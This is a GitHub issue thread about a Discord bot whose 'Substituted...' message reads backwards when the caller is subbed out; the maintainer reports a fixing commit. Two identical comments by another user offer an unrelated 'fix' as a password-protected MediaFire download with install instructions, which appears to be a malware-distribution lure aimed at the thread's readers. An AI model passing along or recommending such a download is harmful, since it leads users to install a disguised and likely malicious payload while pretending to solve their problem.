### ISSUE TITLE
"Substituted..." text is backwards if caller is being subbed out

### ISSUE THREAD

**Issue by jacobdfs** [tribesonecommunity/discord-bots#125]
https://github.com/tribesonecommunity/discord-bots/blob/e114363460883a7a7c5d1923022f1f994c256811/discord_bots/commands.py#L1464

![image](https://github.com/user-attachments/assets/511e5fcc-972a-4c51-895c-48f3aaa0a475)

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by StephenBartos** [comment]
Fixed in commit bcb22be6eb945685cc0af79789cffe3f6a3c10df
